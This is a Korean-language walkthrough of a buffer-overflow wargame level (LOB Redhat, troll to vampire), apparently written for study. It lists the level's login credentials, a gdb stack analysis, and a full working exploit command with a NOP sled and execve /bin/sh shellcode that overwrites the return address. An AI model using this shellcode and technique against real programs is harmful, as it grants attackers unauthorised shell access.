[LOB Redhat] Lv.9 troll -> vampire

문제를 풀기 위해 xshell로 로그인 해 주었다.

ID :  troll / PW : aspirin

가장 먼저 존재하는 파일들을 알아보기 위해 ls -l 명령어를 실행하였다.

vampire.c 파일의 내용을 확인해 보았다.

이번엔 46번째 자리의 값이 "\xff"가 되면 안되는 것 같다. 즉, Return address에 그보다 작은 주소를 주려면 엄청 큰 값을 넣으면 될 것 같다.

일단 vampire 파일을 복사한 뒤

gdb를 사용하여 main 함수의 어셈블리 코드를 살펴보자.

gdb를 통해 스택 상황을 아래와 같다고 생각해 볼 수 있다.

buffer	SFP	RET(return)
40	4	4

argv[2]의 주소를 찾기 위해 strcpy 함수가 끝나는 지점에 bp를 걸고 실행 인자로 "A"*44 + "\xbf\xbf\xbf\xbf" 와 "B"*100000을 따로 넘겨주었다.

인자를 넘겨줄 때, argv[1]에는 "A"를 argv[2]에는 "B"를 넘겨주었기 때문에 x/1000x $esp 명령어를 사용하여 메모리에 쌓여있는 것을 확인할 때, 0x41414141에서 0x42424242으로 바뀌는 지점이 바로 argv[2] 주소의 시작이다.

다행히 argv[2]의 주소가 "\xbfff~"보다 작은 값을 가지는 것 같다. 이제 "B"가 들어간 곳에 "NOP"와 쉘코드를 넣고 RET에 "B"가 들어있는 주소중 하나를 골라 넣어보자.

사용할 코드의 구조는 다음과 같다.

기존 buffer + SFP (44byte)

argv[2]의 주소 : 0xbffe7690

NOP(100000) + shellcode

이대로 공격 코드를 작성해 보았다.

./cpvampire `python -c 'print "A"*44 + "\x90\x76\xfe\xbf" '`  `python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

코드를 실행시킨 결과 쉘이 실행되었다.

 원본파일을 공격해 보자.

성공적으로 비밀번호를 알아내었다!